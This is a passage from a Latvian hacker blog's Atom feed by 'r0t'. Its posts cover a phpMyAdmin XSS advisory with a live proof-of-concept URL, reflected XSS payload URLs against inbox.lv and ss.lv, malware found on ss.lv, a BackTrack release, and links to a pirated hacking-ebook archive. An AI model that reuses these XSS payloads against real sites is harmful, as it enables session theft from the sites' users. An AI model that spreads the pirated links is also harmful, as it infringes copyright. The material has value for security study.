teikt, smiekligi ar tadu infu nekad es nekepatu pat lieku flashku ,kur nu vel vairak. Kaut kadi VID dati, lai kadam atgadinat cik un  kuram ir alga uz papira? To taksh Valsts Kontrole un KNAB utt. var apskatit jebkura bridi.&lt;br /&gt;Laikam cilveks kursh izvelejas vardu Neo , izvelejas to jo masam tas ir daudz pienemaks neka hax0rzzz:)Bet ta reali tadus nikus sev izvelas CS mili,jeb delitanti.&lt;br /&gt;Shodien iegaju Delfos a tur raksts ,ka Chili Pica's klientu dati nopludusi tikla, tipa tiem kuriem tur klientu kartes bija, aarpraac.. he he... smiekligi ko tad ar Picu edaju infu var iesakt, vienigais laikam konkurenti var nofludot tos ar spamu lai dabutu sev kadu klientu vairak un tas ari viss, bet breka liela un atkal tiek pieminets Neo  protams komentos..:))&lt;br /&gt;Cilveku stulbumam laikam nav robezhu..&lt;br /&gt;Ja kads no tiem stulbeniem tagad lasa manis rakstito , tad jebkuras kompanijas vai uznemuma LV datubazi dabut ir tik viegli ,ka aptuveni Azeru prova datubazi dabut, tik kam tas ir vajadzigs.. zhurnalistiem vai?Vai tiem kas pavada visu laiku kadas dzeltenes preses zinas ar iespeju komentet izmetot visu savu zhulti uz visiem launajiem deptutatiem,utt.&lt;br /&gt;Labi tas par to bulshitu kas notiek presse.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ir doma atsakt blogot un ne tikai... vajadzigi ir kadi paris koderi ar taisniem pirkstiem, kuriem butu prieks veltit laiku ka pen-testeriem,toest nodarboties ar ievainojamibu meklesanu,esmu gatavs ari finansiali atbalstit, ja protams jus attaisnosiet uz jums liktas ceribas.Nopelnisiet sev atpazistamibu pasaule vismaz shaja shauraja sfera, ka ari maizei ar desu  nopelnisiet.&lt;br /&gt;&lt;br /&gt;Ka ari welcome visiem tiem kuriem intrese un patik web aplikaciju ievainojamibas .&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Pasts mans ir vecais krustevs gmail.com&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-670673772195673007?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/670673772195673007/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=670673772195673007' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/670673772195673007'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/670673772195673007'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2010/03/garam-ejot-jeb-back.html' title='Garam ejot, jeb back...'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-922709201479322668</id><published>2009-06-30T06:25:00.001-07:00</published><updated>2009-06-30T06:55:01.853-07:00</updated><title type='text'>phpMyAdmin XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 30 june 2009&lt;br /&gt;vendorlink:http://www.phpmyadmin.net/&lt;br /&gt;affected versions:&lt;br /&gt;phpMyAdmin 3.2.0.1&lt;br /&gt;phpMyAdmin 3.2.1-dev&lt;br /&gt;phpMyAdmin 3.3.0-dev&lt;br /&gt;phpMyAdmin 2.11.10-dev&lt;br /&gt;phpMyAdmin 3.2.0-rc1&lt;br /&gt;and another versions also can be affected&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;phpMyAdmin contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "db" paremeter in "index.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;live PoC:&lt;br /&gt;http://demo.phpmyadmin.net/MAINT_3_2_0/index.php?db=%22%3E%27%3E%3Cscript%3Ealert%28%2Fr0t%2F%29%3C%2Fscript%3E&amp;token=f70d8ec4305c5a877f56c14554aced10&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ps.&lt;br /&gt;By changing XSS test requests for popular products like phpMyAdmin vulns like XSS will never ends.To prove my words,just use XSS PoC request from live example by another parameters.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-922709201479322668?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/922709201479322668/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=922709201479322668' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/922709201479322668'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/922709201479322668'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2009/06/phpmyadmin-xss-vuln.html' title='phpMyAdmin XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-5512854416445391869</id><published>2009-06-29T06:24:00.000-07:00</published><updated>2009-06-29T06:32:30.652-07:00</updated><title type='text'>XSS ieksh SS.LV</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_XwbWaSodqYA/SkjA6e_MWmI/AAAAAAAAAAc/X45OHvng_XI/s1600-h/ss.lv.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 179px;" src="http://4.bp.blogspot.com/_XwbWaSodqYA/SkjA6e_MWmI/AAAAAAAAAAc/X45OHvng_XI/s320/ss.lv.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5352740268112894562" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Ka jau lielakai dalai Mekleshanas dzinejiem ir populara kibele ar XSS, tad ss.lv ar neko ipashi neatshkkiras.&lt;br /&gt;Mekleshana:&lt;br /&gt;r0t://www.ss.lv/lv/transport/cars/search/&lt;br /&gt;&lt;br /&gt;parametrs "Cena": ar savam divam ailem "Min" un "Max" ir vieta kur ir ticis nohalturets.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-5512854416445391869?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/5512854416445391869/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=5512854416445391869' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/5512854416445391869'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/5512854416445391869'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2009/06/xss-ieksh-sslv.html' title='XSS ieksh SS.LV'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_XwbWaSodqYA/SkjA6e_MWmI/AAAAAAAAAAc/X45OHvng_XI/s72-c/ss.lv.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-5463901616587767582</id><published>2009-06-29T04:45:00.000-07:00</published><updated>2009-06-29T04:56:11.132-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='E-books'/><category scheme='http://www.blogger.com/atom/ns#' term='Hackers'/><category scheme='http://www.blogger.com/atom/ns#' term='RTFM'/><title type='text'>Hackers Library</title><content type='html'>* Ebook - Computer) Hacking The Windows Registry.pdf&lt;br /&gt;    * (eBook - PDF) Hugo Cornwall - The Hacker's Handbook .pdf&lt;br /&gt;    * (eBook pdf) Hacking into computer systems - a beginners guide.pdf&lt;br /&gt;    * (ebook_-_pdf)_Hacking_IIS_Servers.pdf&lt;br /&gt;    * A Beginners Guide To Hacking Computer Systems.pdf&lt;br /&gt;    * amazon-hacks.chm&lt;br /&gt;    * Attacking the DNS Protocol.pdf&lt;br /&gt;    * Auerbach.Practical.Hacking.Techniques.and.Counterm easures.Nov.2006.pdf&lt;br /&gt;    * bsd-hacks.pdf&lt;br /&gt;    * Certified Ethical Hacker (CEH) v3.0 Official Course.pdf&lt;br /&gt;    * Computer - Hackers Secrets - e-book.pdf&lt;br /&gt;    * cracking-sql-passwords.pdf&lt;br /&gt;    * Crc Press - The Hacker'S Handbook.pdf&lt;br /&gt;    * Credit.Card.Visa.Hack.Ucam.Cl.Tr.560.[223.kB_www.netz.ru].pdf&lt;br /&gt;    * DangerousGoogle-SearchingForSecrets.pdf&lt;br /&gt;    * database hacker handbook.chm&lt;br /&gt;    * Dummies - Hack How To Create Keygens (1).pdf&lt;br /&gt;    * ebay-hacks-100-industrial-strength-tips-and-tools.pdf&lt;br /&gt;    * eBooks.OReilly.-.Wireless.Hacks.100.Industrial.-.Strength.Tips.and.Tools.chm&lt;br /&gt;    * ethical hacking, student guide.pdf&lt;br /&gt;    * excel-hacks.chm&lt;br /&gt;    * google-hacks.pdf&lt;br /&gt;    * Guide-to-Hacking-with-sub7 (1).doc&lt;br /&gt;    * Hack IT Security Through Penetration Testing.pdf&lt;br /&gt;    * Hack Proofing - Your Network - Internet Tradecraft.pdf&lt;br /&gt;    * Hack Proofing Linux A Guide to Open Source Security - Stangler, Lane - Syngress - ISBN 1-928994-34-2.pdf&lt;br /&gt;    * Hack Proofing Sun Solaris 8.pdf&lt;br /&gt;    * Hack Proofing Your E-Commerce Site.pdf&lt;br /&gt;    * Hack Proofing Your Identity In The Information Age.pdf&lt;br /&gt;    * Hack Proofing Your Network Second Edition.pdf&lt;br /&gt;    * Hack Proofing Your Network_First Edition.pdf&lt;br /&gt;    * Hack Proofing Your Web Applications.pdf&lt;br /&gt;    * Hacker Disassembling Uncovered.chm&lt;br /&gt;    * hacker ethic.pdf&lt;br /&gt;    * Hacker Linux Uncovered.chm&lt;br /&gt;    * Hacker Web Exploitation Uncovered.chm&lt;br /&gt;    * Hacker'S.Delight.chm&lt;br /&gt;    * Hackers Beware.pdf&lt;br /&gt;    * Hackers Secrets Revealed.pdf&lt;br /&gt;    * Hackers Secrets.pdf&lt;br /&gt;    * Hackers, Heroes Of The Computer Revolution.pdf&lt;br /&gt;    * Hackers_Secrets.pdf&lt;br /&gt;    * Hacker_s_Guide.pdf&lt;br /&gt;    * Hacking - Firewalls And Networks How To Hack Into Remote Computers.pdf&lt;br /&gt;    * Hacking - The Art of Exploitation.chm&lt;br /&gt;    * Hacking Cisco Routers.pdf&lt;br /&gt;    * Hacking Exposed - Network Security Secrets &amp; Solutions, 2nd Edition.pdf&lt;br /&gt;    * Hacking Exposed Network Security Secrets &amp; Solutions, Third Edition ch1.pdf&lt;br /&gt;    * Hacking For Dummies 1.pdf&lt;br /&gt;    * Hacking For Dummies 2.pdf&lt;br /&gt;    * Hacking For Dummies.pdf&lt;br /&gt;    * Hacking GMail.pdf&lt;br /&gt;    * Hacking IIS Servers.pdf&lt;br /&gt;    * Hacking into computer systems - a beginners guide.pdf&lt;br /&gt;    * hacking the windows registry .pdf&lt;br /&gt;    * Hacking Windows XP.pdf&lt;br /&gt;    * Hacking-ebook - CIA-Book-of-Dirty-Tricks1.pdf&lt;br /&gt;    * Hacking-Hacker's Guide.pdf&lt;br /&gt;    * Hacking-Hackers Secrets Revealed.pdf&lt;br /&gt;    * Hacking-Hugo Cornwall-The Hacker's Handbook .pdf&lt;br /&gt;    * Hacking-The Hacker Crackdown.pdf&lt;br /&gt;    * Hacking.For.Dummies.Access.To.Other.People's.Syste m.Made.Simple.pdf&lt;br /&gt;    * Hacking.Guide.V3.1.pdf&lt;br /&gt;    * Hacking.nfo&lt;br /&gt;    * Hacking.sfv&lt;br /&gt;    * Hackproofing Oracle Application Server.pdf&lt;br /&gt;    * Hack_Attacks_Revealed_A_Complete_Reference_With_Cu stom_Security_Hacking_Toolkit.&lt;br /&gt;    * chm&lt;br /&gt;    * Hack_IT_Security_Through_Penetration_Testing.chm&lt;br /&gt;    * haking.txt&lt;br /&gt;    * Halting.The.Hacker.A.Practical.Guide.To.Computer.S ecurity.chm&lt;br /&gt;    * How to Crack CD Protections.pdf&lt;br /&gt;    * John Wiley &amp; Sons - Hacking For Dummies.pdf&lt;br /&gt;    * John.Wiley.and.Sons.Hacking.Windows.XP.Jul.2004.eB ook-DDU.pdf&lt;br /&gt;    * linux-server-hacks.pdf&lt;br /&gt;    * little_black_book_oc_computer_viruses.pdf&lt;br /&gt;    * mac-os-hacks.chm&lt;br /&gt;    * McGraw-Hill - Hacking Exposed, 3rd Ed - Hacking Exposed Win2.pdf&lt;br /&gt;    * McGraw.Hacking.Exposed.Cisco.Networks.chm&lt;br /&gt;    * McGraw.Hill.HackNotes.Network.Security.Portable.Re ference.eB.pdf&lt;br /&gt;    * McGraw.Hill.HackNotes.Web.Security.Portable.Refere nce.eBook-.pdf&lt;br /&gt;    * McGraw.Hill.HackNotes.Windows.Security.Portable.Re ference.eB.pdf&lt;br /&gt;    * Mind Hacks - Tips &amp; Tricks for Using Your Brain.chm&lt;br /&gt;    * network-security-hacks.chm&lt;br /&gt;    * No.Starch.Press.Hacking.The.Art.Of.Exploitation.ch m&lt;br /&gt;    * O'Reilly - Online Investing Hacks.chm&lt;br /&gt;    * O'Reilly.-.Network.Security.Hacks.chm&lt;br /&gt;    * O'Reilly.Windows.Server.Hack.chm&lt;br /&gt;    * O'Reilly.Windows.Server.Hack.rar&lt;br /&gt;    * online-investing-hacks.chm&lt;br /&gt;    * OReilly Google Hacks, 1st Edition2003.pdf&lt;br /&gt;    * OReilly - Google Hacks.pdf&lt;br /&gt;    * Oreilly, Paypal Hacks (2004) Ddu.chm&lt;br /&gt;    * OReilly,.IRC.Hacks.(2004).DDU.chm&lt;br /&gt;    * OReilly.SQL.Hacks.Nov.2006.chm&lt;br /&gt;    * OSB.Ethical.Hacking.and.Countermeasures.EC.Council .Exam.312.50.Student.Coursewar&lt;br /&gt;    * e.eBook-LiB.chm&lt;br /&gt;    * O_Reilly_-_Windows_XP_Hacks.chm&lt;br /&gt;    * PC Games - How to Crack CD Protection.pdf&lt;br /&gt;    * Security and Hacking - Anti-Hacker Tool Kit Second Edition.chm&lt;br /&gt;    * SoTayHacker1.0.chm&lt;br /&gt;    * spidering-hacks.chm&lt;br /&gt;    * SQL Hacks.chm&lt;br /&gt;    * SQLInjectionWhitePaper.pdf&lt;br /&gt;    * Syngress - Hacking a Terror Network. The Silent Threat of Covert Channels.pdf&lt;br /&gt;    * Syngress -- Hack Proofing Your Wireless Network.pdf&lt;br /&gt;    * Syngress Hack Proofing Your Identity in the Information Age.pdf&lt;br /&gt;    * Syngress.Buffer.Overflow.Attacks.Dec.2004.eBook-DDU.pdf&lt;br /&gt;    * Syngress.Hack.the.Stack.Oct.2006.pdf&lt;br /&gt;    * The Little Black Book Of Computer Virus.pdf&lt;br /&gt;    * The_20Little_20Black_20Book_20of_20Computer_20Viru ses.pdf&lt;br /&gt;    * tivo-hacks.100-industrial-strength-tips-and-tools.pdf&lt;br /&gt;    * u23_Wiley - Hacking GPS - 2005 - (By Laxxuss).pdf&lt;br /&gt;    * Wiley.The.Database.Hackers.Handbook.Defending.Data base.Servers.chm&lt;br /&gt;    * Win XP Hacks oreilly 2003.chm&lt;br /&gt;    * Windows Server Hacks.chm&lt;br /&gt;    * WinXP SP1 Hack.pdf&lt;br /&gt;    * Xbox-hack - AIM-2002-008.pdf&lt;br /&gt;    * Yahoo.Hacks.Oct.2005.chm&lt;br /&gt;&lt;br /&gt;Download from Rapidshare:&lt;br /&gt;&lt;br /&gt;r0t://rapidshare.com/files/82425846/Hacking.part01.rar&lt;br /&gt;r0t://rapidshare.com/files/82442869/Hacking.part02.rar&lt;br /&gt;r0t://rapidshare.com/files/82427993/Hacking.part02.rar&lt;br /&gt;r0t://rapidshare.com/files/82445546/Hacking.part03.rar&lt;br /&gt;r0t://rapidshare.com/files/82430177/Hacking.part03.rar&lt;br /&gt;r0t://rapidshare.com/files/82432614/Hacking.part04.rar&lt;br /&gt;r0t://rapidshare.com/files/82448319/Hacking.part04.rar&lt;br /&gt;r0t://rapidshare.com/files/82451101/Hacking.part05.rar&lt;br /&gt;r0t://rapidshare.com/files/82454225/Hacking.part06.rar&lt;br /&gt;r0t://rapidshare.com/files/82457503/Hacking.part07.rar&lt;br /&gt;r0t://rapidshare.com/files/82460913/Hacking.part08.rar&lt;br /&gt;r0t://rapidshare.com/files/82464586/Hacking.part09.rar&lt;br /&gt;r0t://rapidshare.com/files/82468340/Hacking.part10.rar&lt;br /&gt;r0t://rapidshare.com/files/82471881/Hacking.part11.rar&lt;br /&gt;r0t://rapidshare.com/files/82473464/Hacking.part12.rar&lt;br /&gt;&lt;br /&gt;if download dont works  4 u , change/replace "r0t" to "http".&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;RTFM ;]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-5463901616587767582?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/5463901616587767582/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=5463901616587767582' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/5463901616587767582'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/5463901616587767582'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2009/06/hackers-library.html' title='Hackers Library'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-2307501950908933608</id><published>2009-06-25T14:34:00.000-07:00</published><updated>2009-06-25T14:52:42.034-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='WIFI'/><category scheme='http://www.blogger.com/atom/ns#' term='BACKTRACK'/><title type='text'>Iznakusi BackTrack 4 Pre Release</title><content type='html'>Ligi, ligo, veljorpojam laikam manas asinis ir vairak alus neka asinis.&lt;br /&gt;Bet nepar iet runa , runa ies par Backtrack 4 kuram nupat iznakusi ir "Pre Release".&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_XwbWaSodqYA/SkPxcfozncI/AAAAAAAAAAU/MhmX9r9K7qg/s1600-h/backtrack-4-beta.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 192px;" src="http://2.bp.blogspot.com/_XwbWaSodqYA/SkPxcfozncI/AAAAAAAAAAU/MhmX9r9K7qg/s320/backtrack-4-beta.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5351386254077566402" /&gt;&lt;/a&gt;&lt;br /&gt;Ta ka kursh nevar nociesties un sagaidit Final relizi, tad velkam &lt;a href="http://www.remote-exploit.org/backtrack_download.html"&gt;sheit&lt;/a&gt;.Ja salidzinasim ar Backtrack 4 beta, tad svars ir manami pieaudzis no 854mb uz 1390mb, te jau lielu lomu tas vairs nespele, ja Backtrack tresho vareja dabut virsu uz CD matricas, tad te veel uz DVD paliks daudz brivas vietas:)&lt;br /&gt;Tapatas* var paluureet &lt;a href="http://www.offensive-security.com/videos/backtrack-security-training-video/up-and-running-backtrack.html"&gt;Introduction Video&lt;/a&gt; vai palasit &lt;a href="http://www.offensive-security.com/backtrack4-guide-tutorial.pdf"&gt;.PDF&lt;/a&gt; par to kas jauns lacitim vedera.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-2307501950908933608?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/2307501950908933608/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=2307501950908933608' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/2307501950908933608'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/2307501950908933608'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2009/06/iznakusi-backtrack-4-pre-release.html' title='Iznakusi BackTrack 4 Pre Release'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_XwbWaSodqYA/SkPxcfozncI/AAAAAAAAAAU/MhmX9r9K7qg/s72-c/backtrack-4-beta.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-4526674962200245617</id><published>2009-06-20T06:05:00.000-07:00</published><updated>2009-06-20T07:06:19.969-07:00</updated><title type='text'>SS.lv  Zirgu stallis</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_XwbWaSodqYA/SjziJlUKOhI/AAAAAAAAAAM/GDT84OYbaL8/s1600-h/ss.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 214px;" src="http://3.bp.blogspot.com/_XwbWaSodqYA/SjziJlUKOhI/AAAAAAAAAAM/GDT84OYbaL8/s320/ss.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5349399111672674834" /&gt;&lt;/a&gt;&lt;br /&gt;Iegaju ka tiko ss.lv apskatities sludinajumus un mans AntiVir sak brekt par malware ieksh javascript , kad veras pats sludinajuma logs valja .Vai nu kads zikkeris paspejis ielikt , bez zinjas vai ss.lv piepelnaas:) Kriize , kriize..&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;PS. protams ka ar FF kluse , jo tendets tieshi prieksh IE.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Te ir viens no failiem:&lt;br /&gt;h**p://i.ss.lv/w_inc/decoder.js&lt;br /&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/246649436/Saturs.txt.html"&gt;SATURS&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;iemetot ieksh virustotal.com shadi &lt;a href="http://www.virustotal.com/analisis/d9e87467c4b2a0feaffc0909274664cc509e9c8388334062bbb6b6f59add720e-1245506416"&gt;rezultati&lt;/a&gt; iznaca mums.&lt;br /&gt;no 41 av 2 nobrecas:&lt;br /&gt;AntiVir           7.9.0.19  HEUR/HTML.Malware&lt;br /&gt;McAfee-GW-Edition 6.7.6     Heuristic.HTML.Malware&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-4526674962200245617?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/4526674962200245617/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=4526674962200245617' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/4526674962200245617'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/4526674962200245617'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2009/06/sslv-zirgu-stallis.html' title='SS.lv  Zirgu stallis'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_XwbWaSodqYA/SjziJlUKOhI/AAAAAAAAAAM/GDT84OYbaL8/s72-c/ss.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-624665441049794663</id><published>2009-06-20T02:53:00.000-07:00</published><updated>2009-06-20T05:16:19.920-07:00</updated><title type='text'>Anti XSS ieksh inbox.lv</title><content type='html'>Inbox.lv pats nelietoju, tapeec vareetu teikt ,ka pat nezinaju , kaads tas zveers izskataas. Nejaushi uzduros Googlej0t uz viena &lt;a href="http://rotanovs.com/web-developer/httponly-php/"&gt;bloga&lt;/a&gt;, kur  itka publicejas:&lt;br /&gt;"Jul 2001–Feb 2007: Chief Developer at Inbox.lv, largest Latvian Internet portal, proud to say it moved from #4 to #1 in terms of weekly unique visitors since I joined the company." jeb vienkarshi Viktors Rotanovs.&lt;br /&gt;Labi , protams rodas iespaids Chief Developer iespejams ka mega labs , par vinja pro neshaubos nemirkli un rekur vel pamaciba bloga par Anti-XSS , tad jau itka visam inbox.lv vajadzetu buut kaartiibaa , ieshu ka es paluukoshos.&lt;br /&gt;Es biju mazliet parsteigts, ka lielako ties tam mega portalam nekas pashu rokam nav rakstits*, pa bazi njemti gatavi mazliet modificeti, ka piem pats pasts tiraka Horde,tie amigos ir viens no MySpace kloniem kuri metajas tiimeklii.&lt;br /&gt;Tad par XSS, uzmetu aci ipashi nechenshoties pat testa pieprasijumu nemainot atradu paariiti.Isak sakot es domaju ka tas viss ir paradijies peec 2007-ta jo Viktors to nebutu pielavis..:)&lt;br /&gt;&lt;br /&gt;Amigos, jeb MySpace klons&lt;br /&gt;&lt;br /&gt;MySpace Klons&lt;br /&gt;http://amigos.inbox.lv/index.php?mode=report_spam&amp;cat=1&amp;id=155522&amp;from=%22%3E%3Cscript%3Ealert(111);%3C/script%3E&lt;br /&gt;http://amigos.inbox.lv/index.php?mode=report_spam&amp;cat=1&amp;id=155522%22%3E%3Cscript%3Ealert(111);%3C/script%3E&lt;br /&gt;http://amigos.inbox.lv/index.php?mode=report_spam&amp;cat=1%22%3E%3Cscript%3Ealert(111);%3C/script%3E&lt;br /&gt;&lt;br /&gt;ps. index vieta admin un esam , pie sprices:)&lt;br /&gt;&lt;br /&gt;http://work.inbox.lv/darbs/o-%22%3E%3Cscript%3Ealert(111);%3C/script%3E.html&lt;br /&gt;http://smart.inbox.lv/?logout=1%22%3E%3Cscript%3Ealert(111);%3C/script%3E&lt;br /&gt;http://smart.inbox.lv/cr_game/index.php?game_id=15420&amp;rnd=%22%3E%3Cscript%3Ealert(111);%3C/script%3E&lt;br /&gt;http://smart.inbox.lv/cr_game/index.php?game_id=%22%3E%3Cscript%3Ealert(111);%3C/script%3E&lt;br /&gt;&lt;br /&gt;Ja ticet readme.html failam kas metajas tur, tad WP versija ir 1.5:)&lt;br /&gt;http://company.inbox.lv/news/readme.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;PS.Jau ieprieks atvainojos par sagadatam neertibam, ne pret Viktoru ne pret inbox.lv kolektivu nav man nekadas pretenzijas, es tikai garam ejot ,lai paskatitos ,ka jums iet.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-624665441049794663?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/624665441049794663/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=624665441049794663' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/624665441049794663'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/624665441049794663'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2009/06/anti-xss-ieksh-inboxlv.html' title='Anti XSS ieksh inbox.lv'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 